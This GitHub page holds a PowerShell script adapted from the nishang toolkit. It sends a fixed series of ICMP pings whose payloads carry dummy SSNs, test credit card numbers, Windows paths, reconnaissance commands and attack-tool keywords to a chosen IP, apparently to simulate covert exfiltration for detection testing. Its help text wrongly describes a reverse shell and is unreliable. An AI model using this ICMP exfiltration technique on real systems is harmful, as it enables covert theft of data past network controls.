-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathExfil-Icmp.ps1
166 lines (112 loc) · 9.16 KB
/
Exfil-Icmp.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
# I hacked up the function Invoke-PowerShellIcmp from the nishang toolkit for this one.
function Exfil-Icmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
The server to be used with it is icmpsh_m.py from the icmpsh tools (https://github.com/inquisb/icmpsh).
.PARAMETER IPAddress
The IP address of the server/listener to connect to.
.PARAMETER Delay
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
.EXAMPLE
PS > Invoke-PowerShellIcmp-IPAddress 192.168.254.226
Above shows an example of an interactive PowerShell reverse connect shell.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$IPAddress
)
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClient = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$sendbytes = ([text.encoding]::ASCII).GetBytes('testing 1')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('SSN 1 - 123-45-6789')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('SSN 1 - 123-45-6789')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('SSN 2 - 123.45.6789')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('SSN 3 - 123456789')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Amex 1 - American Express 378282246310005')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Amex 2 - American Express 371449635398431')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Amex 3 - American Express Corporate 378734493671000')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Austr 1 - Australian BankCard 5610591081018250')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Diners 1 - Diners Club 30569309025904')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Diners 2 - Diners Club 38520000023237')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Disco 1 - Discover 6011111111111110')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Disco 2 - Discover 6011000990139420')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card JCB 1 - JCB 3530111333300000')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card JCB 2 - JCB 3566002020360500')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card JCB 2 - JCB 3566002020360500')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Master 1 - MasterCard 5555555555554440')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Master 2 - MasterCard 5105105105105100')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Maestro 1 - Maestro 6799990100000000019')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Visa 1 - Visa 4111111111111110')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Visa 2 - Visa 4012888888881880')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Visa 3 - Visa 4222222222222')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('Credit Card Visa Deb 1 - Visa Debit 4917610000000000003')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('C:\')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('C:\Windows>')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('C:\Windows\System32>')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('C:\Program Files>')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('dir')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('net use')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('net user')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('unattend')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('sysprep')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('groups.xml')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('powertools')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('powersploit')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('metasploit')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('meterpreter')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('beacon')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('shell')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
$sendbytes = ([text.encoding]::ASCII).GetBytes('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
$ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null
}